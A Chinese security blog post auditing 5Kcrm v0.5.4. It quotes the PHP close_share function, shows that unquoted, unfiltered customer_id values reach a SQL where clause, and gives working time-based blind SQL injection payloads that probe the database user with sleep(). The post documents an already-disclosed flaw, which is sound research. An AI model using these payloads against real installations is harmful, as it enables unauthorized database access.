一直没人讲代码审计。（漏洞发过，别想了）

问题出在
5Kcrmv0.5.4/App/Lib/Action/CustomerAction.class.php

• public function close_share(){
• if($this­>isPost()){
• $m_share = M('customerShare');
• $customer_ids = is_array($_POST['customer_id']) ? implode(',', $_POST['customer_id']) : '';
• if (empty($customer_ids)) {
• alert('error', L('HAVE_NOT CHOOSE_ANY CONTENT'), $_SERVER['HTTP_REFERER']);
• }
•  
• else {
•  
• $is_deleted = $m_share ­>where('customer_id in (%s)',$customer_ids)­>delete(); if($is_deleted){
• alert('success','关闭共享成功！',$_SERVER["HTTP_REFERER"]); }else{
• alert('error','关闭共享失败！',$_SERVER["HTTP_REFERER"]);
•  
• }
•  
• }

[color=rgb(85, 85, 85) !important]复制代码
获取数组参数customer_id后，添加逗号拼接成字符串，然后直接带入到where语句中，没过滤，没有引号包围。可以注入
http://127.0.0.1/5Kcrmv0.5.4/ind ... r&a=close_share

POST：customer_id[]=1) and if(substring(user(),1,4)=0x726f6f74,sleep(5),1))­­ 1

当user()前四位为root时，成功延迟


当错误时，不延时

customer_id[]=1) and if(substring(user(),1,4)=0x111,sleep(5),1))­­ 1




看看sql执行情况

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Code/233.html